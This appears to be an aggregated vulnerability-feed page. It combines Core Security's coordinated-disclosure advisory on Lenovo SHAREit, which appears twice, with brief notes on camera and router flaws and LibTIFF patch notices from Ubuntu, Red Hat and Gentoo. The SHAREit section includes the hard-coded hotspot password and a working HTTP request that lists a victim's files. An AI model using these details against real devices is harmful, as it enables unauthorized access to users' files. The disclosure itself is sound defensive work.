concurrently with Core's advisory. Lenovo requested a draft version of the advisory in order to ensure consistency among publications. They asked how Core would like to be acknowledged in their advisory and offered additional publication dates in case they couldn't meet the Monday 11 deadline. 2016-01-05: Core Security informed Lenovo that the additional publication dates ares acceptable if Core is informed with time of such changes. We informed that we would send them a draft of the advisory once it was completed and sent them the acknowledgment line as requested. 2016-01-06: Core Security sent Lenovo the draft version of the advisory. 2016-01-08: Lenovo informed Core Security that due they discovered additional vulnerabilities they requested to address both platform issues together. Additionaly thay requested an extension to the publication date to mid-February and a possibility to keep updating Lenovo SHAREit. 2016-01-08: Core Security informed Lenovo that it was our first request to address all vulnerabilities in one advisory. Additinally we requested to know which vulnerabilities they were planning to address, and if those included any of the reported by us. We expressed our willingness to extend the deadline even though the maximum 3 months period we define was already over. 2016-01-08: Lenovo informed Core Security that they intend to address al the reported vulnerabilities by us and requested confimration on extending the date of our joint disclosure to mid-February 2016-01-08: Core Security informed Lenovo that we wanted to know exactly when each vulnerability was going to be addressed in advanced in order to agree to extend the date of our joint disclosure. 2016-01-08: Lenovo informed Core Security that they agreed to our terms. 2016-01-14: Lenovo informed Core Security that they were going to publish the new versions for both platforms addressing all the reported vulnerabilities on January 15 and expected to release the joint disclosure on mid-February. 2016-01-14: Core Security informed Lenovo that is our policy to disclose our findings once the new version correcting the issues becomes available. We informed them that if that was going to happen the following day, we would be forced to publish our security advisory the following day as well. 2016-01-15: Lenovo informed Core Security that they misunderstood our disclosure policy. They informed us that they would probably be publishing the following week and no later than January 22. 2016-01-15: Core Security informed Lenovo that we commited to a joint security disclosure the day the software releases went live and requested an advanced notice as soon as they could. 2016-01-19: Lenovo informed Core Security that they agreed to our request. 2016-01-20: Core Security informed Lenovo that they would be publishing both versions on Friday 22 of January. 2016-01-20: Core Security requested Lenovo to release the updates on Monday 25 of January as it was recommended before in order to give the affected users enough working days to download and install the new version. 2016-01-21: Lenovo informed Core Security that they agreed to release on Monday, January 25. They also informed that they would be publishing their security advisory as well. 2016-01-25: Advisory CORE-2016-0002 published. 9. References [1] http://shareit.lenovo.com/#DOWNLOAD. [2] http://www.lenovo.com. 10. About CoreLabs CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. About Core Security Technologies Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. Disclaimer The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. PGP/GPG Keys This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

Lenovo SHAREit before 3.2.0 for Windows and SHAREit before 3.5.48_ww for Android transfer files in cleartext, which allows remote attackers to (1) obtain sensitive information by sniffing the network or (2) conduct man-in-the-middle (MITM) attacks via unspecified vectors. Supplementary information : CWE Vulnerability type by CWE-254: Security Features ( Security function ) Has been identified. http://cwe.mitre.org/data/definitions/254.htmlBy a third party (1) By intercepting the network, important information can be obtained, or (2) Middle man (man-in-the-middle/MITM) An attack may be executed. Lenovo ShareIT is prone to multiple security vulnerabilities. An attacker can exploit these issues to bypass certain security restrictions and gain access to sensitive information, to perform man-in-the-middle attacks and bypass authorization mechanism. Lenovo SHAREit (Eggplant Express) is a set of file sharing software from China Lenovo (Lenovo). 1. Advisory Information Title: Lenovo ShareIT Multiple Vulnerabilities Advisory ID: CORE-2016-0002 Advisory URL: http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities Date published: 2016-01-25 Date of last update: 2016-01-22 Vendors contacted: Lenovo Release mode: Coordinated release 2. Vulnerability Information Class: Use of Hard-coded Password [CWE-259], Information Exposure [CWE-200], Missing Encryption of Sensitive Data [CWE-311], Missing Authorization [CWE-862] Impact: Security bypass, Information leak Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2016-1491, CVE-2016-1490, CVE-2016-1489, CVE-2016-1492 3. Vulnerability Description SHAREit [1] is a free application from Lenovo [2] that lets you easily share files and folders among smartphones, tablets, and personal computers. 4. Vulnerable Packages Lenovo SHAREit for Android 3.0.18_ww Lenovo SHAREit for Windows 2.5.1.1 Other products and versions may also be affected, but they were not tested. 5. Vendor Information, Solutions and Workarounds Lenovo released an updated version of Lenovo SHAREit for Windows and Android that fix the reported issues. The new version of the products can be found here [1]. 6. Credits This vulnerability was discovered and researched by Ivan Huertas from Core Security Consulting Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core Security Advisories Team. 7. Technical Description / Proof of Concept Code 7.1. Hard-coded password in Lenovo SHAREit for Windows [CVE-2016-1491] When Lenovo SHAREit for Windows is configured to receive files, a Wifi HotSpot is set with an easy password (12345678). Any system with a Wifi Network card could connect to that Hotspot by using that password. The password is always the same. 7.2. Remote browsing of file system on Lenovo SHAREit for Windows [CVE-2016-1490] When the WiFi network is on and connected with the default password (12345678), the files can be browsed but not downloaded by performing an HTTP Request to the WebServer launched by Lenovo SHAREit. The following request was used to perform this action: POST /list?type=file&path=C%3A%5CUsers\admin HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; XT1032 Build/KXB21.14-L1.40) Host: 192.168.173.1:2999 Connection: Keep-Alivek Accept-Encoding: gzip Content-Length: 0 HTTP/1.0 200 OK Content-Length: 2426 {"containers":[{"filepath":"C:\\Users\\admin\\Contacts","has_thumbnail":false,"id":"C:\\Users\\admin\\Contacts","isloaded":false,"isroot":false,"isvolume":false,"name":"Contacts","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Desktop","has_thumbnail":false,"id":"C:\\Users\\admin\\Desktop","isloaded":false,"isroot":false,"isvolume":false,"name":"Desktop","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Documents","has_thumbnail":false,"id":"C:\\Users\\admin\\Documents","isloaded":false,"isroot":false,"isvolume":false,"name":"Documents","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Downloads","has_thumbnail":false,"id":"C:\\Users\\admin\\Downloads","isloaded":false,"isroot":false,"isvolume":false,"name":"Downloads","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Favorites","has_thumbnail":false,"id":"C:\\Users\\admin\\Favorites","isloaded":false,"isroot":false,"isvolume":false,"name":"Favorites","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Links", "has_thumbnail":false,"id":"C:\\Users\\admin\\Links","isloaded":false,"isroot":false,"isvolume":false,"name":"Links","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Music","has_thumbnail":false,"id":"C:\\Users\\admin\\Music","isloaded":false,"isroot":false,"isvolume":false,"name":"My Music","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Pictures","has_thumbnail":false,"id":"C:\\Users\\admin\\Pictures","isloaded":false,"isroot":false,"isvolume":false,"name":"My Pictures","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Saved Games","has_thumbnail":false,"id":"C:\\Users\\admin\\Saved Games","isloaded":false,"isroot":false,"isvolume":false,"name":"Saved Games","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Searches","has_thumbnail":false,"id":"C:\\Users\\admin\\Searches","isloaded":false,"isroot":false,"isvolume":false,"name":"Searches","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Tracing","has_thumbnail":false,"id":"C:\\Users\\admin\\Tracing","isloaded":false,"isroot":false,"isvolume":false,"name":"Tracing","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Videos","has_thumbnail":false,"id":"C:\\Users\\admin\\Videos","isloaded":false,"isroot":false,"isvolume":false,"name":"My ","type":"file","ver":""}],"filepath":"C:\\Users\\admin","has_thumbnail":false,"id":"C:\\Users\\admin","isloaded":true,"isroot":false,"isvolume":false,"name":"admin","type":"file","ver":""} 7.3. Files transferred in plain text in Windows and Android version of Lenovo SHAREit [CVE-2016-1489] The files are transfered via HTTP without encryption. 7.4. Open WiFi Network defined on Android devices [CVE-2016-1492] When the application is configured to receive files, an open Wifi HotSpot is created without any password. An attacker could connect to that HotSpot and capture the information transferred between those devices. 8. Report Timeline 2015-10-29: Core Security sent an initial notification to Lenovo. 2015-10-29: Lenovo replied attaching their public PGP key. 2015-10-29: Core Security sent Lenovo a draft version of the advisory and requested a tentative day for the release of the patched version. 2015-10-29: Lenovo replied their development team would review Core Security findings. 2015-11-06: Lenovo informed that they would like to discuss their progress in a telephone meeting. 2015-11-06: Core Security replied Lenovo that is our policy not to have such communications in order to always keep a log of all interactions with the vendor. 2015-11-06: Lenovo replied they understood Core Security policy and asked if the first disclosure date was negotiable. 2015-11-06: Core Security replied Lenovo that the date was negotiable, being the priority to make a coordinated release. 2015-11-13: Lenovo informed Core Security they had addressed the Windows version issues and could share a beta fix for us to validate. They informed as well that the development team would continue to investigate the Android version issues. 2015-11-20: Lenovo asked Core Security for feedback regarding their beta fix. 2015-11-20: Core Security replied saying there was a small delay in the review of the beta fix and informed Lenovo they would send a reply next week. 2015-11-20: Lenovo asked Core Security to confirm that the publication date of the advisory was not going to be on November 30, and asked to seek an agreement regarding a specific date. 2015-11-23: Core Security replied stating that they were not going to publish their findings on November 30, and the idea was to coordinate a schedule according to the release date of the corrected versions. Additionally, Core Security informed Lenovo regarding the beta fix, which was still using the hardcoded password. 2015-11-23: Lenovo informed Core Security that they had forwarded Core's analysis to their development team. 2015-11-25: Lenovo informed Core Security that they considered that issue as resolved considering that the hardcoded password was not present in the "secure mode" and only used in the "easy mode". 2015-12-06: Lenovo informed Core Security that they were still working on the schedule. 2015-12-07: Lenovo informed Core Security that they were targeting to release the updated Windows version on January 10 and that they would continue working with their third party partner for the Android version release. 2016-01-04: Core Security asked Lenovo if the publication date could be moved from Sunday 10 to Monday 11 of January. 2016-01-04: Lenovo asked Core Security for more specific justifications for not releasing on a Sunday. 2016-01-05: Core Security informed Lenovo that is always recommend to publish on a working day in order to give enough time to the affected users to update their products (particularly corporate users) and avoid explotations of the published flaws by malicious users on the weekend. 2016-01-05: Lenovo informed Core Security that they agreed to publish on Monday 11 but that they hadn't planned a date for their advisory disclosure. 2016-01-05: Core Security informed Lenovo that our advisory would be published the same day as the release of the new version. 2015-01-05: Lenovo informed Core Security that they would publish their advisory concurrently with Core's advisory. Lenovo requested a draft version of the advisory in order to ensure consistency among publications. They asked how Core would like to be acknowledged in their advisory and offered additional publication dates in case they couldn't meet the Monday 11 deadline. 2016-01-05: Core Security informed Lenovo that the additional publication dates ares acceptable if Core is informed with time of such changes. We informed that we would send them a draft of the advisory once it was completed and sent them the acknowledgment line as requested. 2016-01-06: Core Security sent Lenovo the draft version of the advisory. 2016-01-08: Lenovo informed Core Security that due they discovered additional vulnerabilities they requested to address both platform issues together. Additionaly thay requested an extension to the publication date to mid-February and a possibility to keep updating Lenovo SHAREit. 2016-01-08: Core Security informed Lenovo that it was our first request to address all vulnerabilities in one advisory. Additinally we requested to know which vulnerabilities they were planning to address, and if those included any of the reported by us. We expressed our willingness to extend the deadline even though the maximum 3 months period we define was already over. 2016-01-08: Lenovo informed Core Security that they intend to address al the reported vulnerabilities by us and requested confimration on extending the date of our joint disclosure to mid-February 2016-01-08: Core Security informed Lenovo that we wanted to know exactly when each vulnerability was going to be addressed in advanced in order to agree to extend the date of our joint disclosure. 2016-01-08: Lenovo informed Core Security that they agreed to our terms. 2016-01-14: Lenovo informed Core Security that they were going to publish the new versions for both platforms addressing all the reported vulnerabilities on January 15 and expected to release the joint disclosure on mid-February. 2016-01-14: Core Security informed Lenovo that is our policy to disclose our findings once the new version correcting the issues becomes available. We informed them that if that was going to happen the following day, we would be forced to publish our security advisory the following day as well. 2016-01-15: Lenovo informed Core Security that they misunderstood our disclosure policy. They informed us that they would probably be publishing the following week and no later than January 22. 2016-01-15: Core Security informed Lenovo that we commited to a joint security disclosure the day the software releases went live and requested an advanced notice as soon as they could. 2016-01-19: Lenovo informed Core Security that they agreed to our request. 2016-01-20: Core Security informed Lenovo that they would be publishing both versions on Friday 22 of January. 2016-01-20: Core Security requested Lenovo to release the updates on Monday 25 of January as it was recommended before in order to give the affected users enough working days to download and install the new version. 2016-01-21: Lenovo informed Core Security that they agreed to release on Monday, January 25. They also informed that they would be publishing their security advisory as well. 2016-01-25: Advisory CORE-2016-0002 published. 9. References [1] http://shareit.lenovo.com/#DOWNLOAD. [2] http://www.lenovo.com. 10. About CoreLabs CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. About Core Security Technologies Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. Disclaimer The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. PGP/GPG Keys This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

Buffalo LinkStation 420 is a NAS network storage of Japan Buffalo Group. A denial of service vulnerability exists in the Buffalo LinkStation 420. An attacker could use this vulnerability to shut down the device and deny service to legitimate users

Zhejiang Dahua Technology Co., Ltd. is a leading monitoring product supplier and solution service provider , Provide the world's leading series of video storage, front-end, display control and intelligent transportation products to the world. Dahua IPC-HF2100 Waiting for the camera onvif Agreement snapshot Interface access does not require authentication, allowing an attacker to directly access the live video image of the camera.

Hikvision cameras, napshot Interface access does not require authentication, allowing an attacker to directly access the live video image of the camera.

Hikvision camera has weak password, allowing initial password login

Dlink Backdoor exists, users can log in without password

ftp The signature access vulnerability allows unauthorized remote access to system management.

The NeXTDecode function in tif_next.c in LibTIFF allows remote attackers to cause a denial of service (out-of-bounds write) via a crafted TIFF image, as demonstrated by libtiff5.tif. LibTIFF is prone to a memory-corruption vulnerability. An attacker could exploit this issue to execute arbitrary code in the affected system. Failed exploit attempts may result in denial-of-service conditions. ============================================================================ Ubuntu Security Notice USN-2939-1 March 23, 2016 tiff vulnerabilities ============================================================================ A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 15.10 - Ubuntu 14.04 LTS - Ubuntu 12.04 LTS Summary: LibTIFF could be made to crash or run programs as your login if it opened a specially crafted file. Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 15.10: libtiff5 4.0.3-12.3ubuntu2.1 Ubuntu 14.04 LTS: libtiff5 4.0.3-7ubuntu0.4 Ubuntu 12.04 LTS: libtiff4 3.9.5-2ubuntu1.9 In general, a standard system update will make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Important: libtiff security update Advisory ID: RHSA-2016:1546-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-1546.html Issue date: 2016-08-02 CVE Names: CVE-2014-8127 CVE-2014-8129 CVE-2014-8130 CVE-2014-9330 CVE-2014-9655 CVE-2015-1547 CVE-2015-7554 CVE-2015-8665 CVE-2015-8668 CVE-2015-8683 CVE-2015-8781 CVE-2015-8782 CVE-2015-8783 CVE-2015-8784 CVE-2016-3632 CVE-2016-3945 CVE-2016-3990 CVE-2016-3991 CVE-2016-5320 ===================================================================== 1. Summary: An update for libtiff is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64 3. Description: The libtiff packages contain a library of functions for manipulating Tagged Image File Format (TIFF) files. Security Fix(es): * Multiple flaws have been discovered in libtiff. A remote attacker could exploit these flaws to cause a crash or memory corruption and, possibly, execute arbitrary code by tricking an application linked against libtiff into processing specially crafted files. (CVE-2014-9655, CVE-2015-1547, CVE-2015-8784, CVE-2015-8683, CVE-2015-8665, CVE-2015-8781, CVE-2015-8782, CVE-2015-8783, CVE-2016-3990, CVE-2016-5320) * Multiple flaws have been discovered in various libtiff tools (bmp2tiff, pal2rgb, thumbnail, tiff2bw, tiff2pdf, tiffcrop, tiffdither, tiffsplit, tiff2rgba). By tricking a user into processing a specially crafted file, a remote attacker could exploit these flaws to cause a crash or memory corruption and, possibly, execute arbitrary code with the privileges of the user running the libtiff tool. (CVE-2014-8127, CVE-2014-8129, CVE-2014-8130, CVE-2014-9330, CVE-2015-7554, CVE-2015-8668, CVE-2016-3632, CVE-2016-3945, CVE-2016-3991) 4. Solution: For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 All running applications linked against libtiff must be restarted for this update to take effect. 5. Package List: Red Hat Enterprise Linux Client (v. 7): Source: libtiff-4.0.3-25.el7_2.src.rpm x86_64: libtiff-4.0.3-25.el7_2.i686.rpm libtiff-4.0.3-25.el7_2.x86_64.rpm libtiff-debuginfo-4.0.3-25.el7_2.i686.rpm libtiff-debuginfo-4.0.3-25.el7_2.x86_64.rpm Red Hat Enterprise Linux Client Optional (v. 7): x86_64: libtiff-debuginfo-4.0.3-25.el7_2.i686.rpm libtiff-debuginfo-4.0.3-25.el7_2.x86_64.rpm libtiff-devel-4.0.3-25.el7_2.i686.rpm libtiff-devel-4.0.3-25.el7_2.x86_64.rpm libtiff-static-4.0.3-25.el7_2.i686.rpm libtiff-static-4.0.3-25.el7_2.x86_64.rpm libtiff-tools-4.0.3-25.el7_2.x86_64.rpm Red Hat Enterprise Linux ComputeNode (v. 7): Source: libtiff-4.0.3-25.el7_2.src.rpm x86_64: libtiff-4.0.3-25.el7_2.i686.rpm libtiff-4.0.3-25.el7_2.x86_64.rpm libtiff-debuginfo-4.0.3-25.el7_2.i686.rpm libtiff-debuginfo-4.0.3-25.el7_2.x86_64.rpm Red Hat Enterprise Linux ComputeNode Optional (v. 7): x86_64: libtiff-debuginfo-4.0.3-25.el7_2.i686.rpm libtiff-debuginfo-4.0.3-25.el7_2.x86_64.rpm libtiff-devel-4.0.3-25.el7_2.i686.rpm libtiff-devel-4.0.3-25.el7_2.x86_64.rpm libtiff-static-4.0.3-25.el7_2.i686.rpm libtiff-static-4.0.3-25.el7_2.x86_64.rpm libtiff-tools-4.0.3-25.el7_2.x86_64.rpm Red Hat Enterprise Linux Server (v. 7): Source: libtiff-4.0.3-25.el7_2.src.rpm ppc64: libtiff-4.0.3-25.el7_2.ppc.rpm libtiff-4.0.3-25.el7_2.ppc64.rpm libtiff-debuginfo-4.0.3-25.el7_2.ppc.rpm libtiff-debuginfo-4.0.3-25.el7_2.ppc64.rpm libtiff-devel-4.0.3-25.el7_2.ppc.rpm libtiff-devel-4.0.3-25.el7_2.ppc64.rpm ppc64le: libtiff-4.0.3-25.el7_2.ppc64le.rpm libtiff-debuginfo-4.0.3-25.el7_2.ppc64le.rpm libtiff-devel-4.0.3-25.el7_2.ppc64le.rpm s390x: libtiff-4.0.3-25.el7_2.s390.rpm libtiff-4.0.3-25.el7_2.s390x.rpm libtiff-debuginfo-4.0.3-25.el7_2.s390.rpm libtiff-debuginfo-4.0.3-25.el7_2.s390x.rpm libtiff-devel-4.0.3-25.el7_2.s390.rpm libtiff-devel-4.0.3-25.el7_2.s390x.rpm x86_64: libtiff-4.0.3-25.el7_2.i686.rpm libtiff-4.0.3-25.el7_2.x86_64.rpm libtiff-debuginfo-4.0.3-25.el7_2.i686.rpm libtiff-debuginfo-4.0.3-25.el7_2.x86_64.rpm libtiff-devel-4.0.3-25.el7_2.i686.rpm libtiff-devel-4.0.3-25.el7_2.x86_64.rpm Red Hat Enterprise Linux Server Optional (v. 7): ppc64: libtiff-debuginfo-4.0.3-25.el7_2.ppc.rpm libtiff-debuginfo-4.0.3-25.el7_2.ppc64.rpm libtiff-static-4.0.3-25.el7_2.ppc.rpm libtiff-static-4.0.3-25.el7_2.ppc64.rpm libtiff-tools-4.0.3-25.el7_2.ppc64.rpm ppc64le: libtiff-debuginfo-4.0.3-25.el7_2.ppc64le.rpm libtiff-static-4.0.3-25.el7_2.ppc64le.rpm libtiff-tools-4.0.3-25.el7_2.ppc64le.rpm s390x: libtiff-debuginfo-4.0.3-25.el7_2.s390.rpm libtiff-debuginfo-4.0.3-25.el7_2.s390x.rpm libtiff-static-4.0.3-25.el7_2.s390.rpm libtiff-static-4.0.3-25.el7_2.s390x.rpm libtiff-tools-4.0.3-25.el7_2.s390x.rpm x86_64: libtiff-debuginfo-4.0.3-25.el7_2.i686.rpm libtiff-debuginfo-4.0.3-25.el7_2.x86_64.rpm libtiff-static-4.0.3-25.el7_2.i686.rpm libtiff-static-4.0.3-25.el7_2.x86_64.rpm libtiff-tools-4.0.3-25.el7_2.x86_64.rpm Red Hat Enterprise Linux Workstation (v. 7): Source: libtiff-4.0.3-25.el7_2.src.rpm x86_64: libtiff-4.0.3-25.el7_2.i686.rpm libtiff-4.0.3-25.el7_2.x86_64.rpm libtiff-debuginfo-4.0.3-25.el7_2.i686.rpm libtiff-debuginfo-4.0.3-25.el7_2.x86_64.rpm libtiff-devel-4.0.3-25.el7_2.i686.rpm libtiff-devel-4.0.3-25.el7_2.x86_64.rpm Red Hat Enterprise Linux Workstation Optional (v. 7): x86_64: libtiff-debuginfo-4.0.3-25.el7_2.i686.rpm libtiff-debuginfo-4.0.3-25.el7_2.x86_64.rpm libtiff-static-4.0.3-25.el7_2.i686.rpm libtiff-static-4.0.3-25.el7_2.x86_64.rpm libtiff-tools-4.0.3-25.el7_2.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2014-8127 https://access.redhat.com/security/cve/CVE-2014-8129 https://access.redhat.com/security/cve/CVE-2014-8130 https://access.redhat.com/security/cve/CVE-2014-9330 https://access.redhat.com/security/cve/CVE-2014-9655 https://access.redhat.com/security/cve/CVE-2015-1547 https://access.redhat.com/security/cve/CVE-2015-7554 https://access.redhat.com/security/cve/CVE-2015-8665 https://access.redhat.com/security/cve/CVE-2015-8668 https://access.redhat.com/security/cve/CVE-2015-8683 https://access.redhat.com/security/cve/CVE-2015-8781 https://access.redhat.com/security/cve/CVE-2015-8782 https://access.redhat.com/security/cve/CVE-2015-8783 https://access.redhat.com/security/cve/CVE-2015-8784 https://access.redhat.com/security/cve/CVE-2016-3632 https://access.redhat.com/security/cve/CVE-2016-3945 https://access.redhat.com/security/cve/CVE-2016-3990 https://access.redhat.com/security/cve/CVE-2016-3991 https://access.redhat.com/security/cve/CVE-2016-5320 https://access.redhat.com/security/updates/classification/#important 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD8DBQFXoNKIXlSAg2UNWIIRAn0mAJ49V9uRtJCn4vAWPIfVZ3ptCa4NDQCbBuTb H5YX3gD3gJu8C4EadiP+wtg= =Z4gh -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201701-16 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: libTIFF: Multiple vulnerabilities Date: January 09, 2017 Bugs: #484542, #534108, #538318, #561880, #572876, #585274, #585508, #599746 ID: 201701-16 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in libTIFF, the worst of which may allow execution of arbitrary code. It is called by numerous programs, including GNOME and KDE applications, to interpret TIFF images. Please review the CVE identifier and bug reports referenced for details. Workaround ========== There is no known workaround at this time. Resolution ========== All libTIFF users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/tiff-4.0.7" References ========== [ 1 ] CVE-2013-4243 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4243 [ 2 ] CVE-2014-8127 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8127 [ 3 ] CVE-2014-8128 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8128 [ 4 ] CVE-2014-8129 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8129 [ 5 ] CVE-2014-8130 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8130 [ 6 ] CVE-2014-9330 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9330 [ 7 ] CVE-2014-9655 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9655 [ 8 ] CVE-2015-1547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1547 [ 9 ] CVE-2015-7313 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7313 [ 10 ] CVE-2015-7554 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7554 [ 11 ] CVE-2015-8665 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8665 [ 12 ] CVE-2015-8668 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8668 [ 13 ] CVE-2015-8683 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8683 [ 14 ] CVE-2015-8781 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8781 [ 15 ] CVE-2015-8782 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8782 [ 16 ] CVE-2015-8783 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8783 [ 17 ] CVE-2015-8784 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8784 [ 18 ] CVE-2016-3186 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3186 [ 19 ] CVE-2016-3619 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3619 [ 20 ] CVE-2016-3620 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3620 [ 21 ] CVE-2016-3621 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3621 [ 22 ] CVE-2016-3622 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3622 [ 23 ] CVE-2016-3623 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3623 [ 24 ] CVE-2016-3624 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3624 [ 25 ] CVE-2016-3625 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3625 [ 26 ] CVE-2016-3631 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3631 [ 27 ] CVE-2016-3632 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3632 [ 28 ] CVE-2016-3633 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3633 [ 29 ] CVE-2016-3634 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3634 [ 30 ] CVE-2016-3658 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3658 [ 31 ] CVE-2016-3945 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3945 [ 32 ] CVE-2016-3990 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3990 [ 33 ] CVE-2016-3991 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3991 [ 34 ] CVE-2016-5102 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5102 [ 35 ] CVE-2016-5314 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5314 [ 36 ] CVE-2016-5315 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5315 [ 37 ] CVE-2016-5316 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5316 [ 38 ] CVE-2016-5317 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5317 [ 39 ] CVE-2016-5318 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5318 [ 40 ] CVE-2016-5319 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5319 [ 41 ] CVE-2016-5320 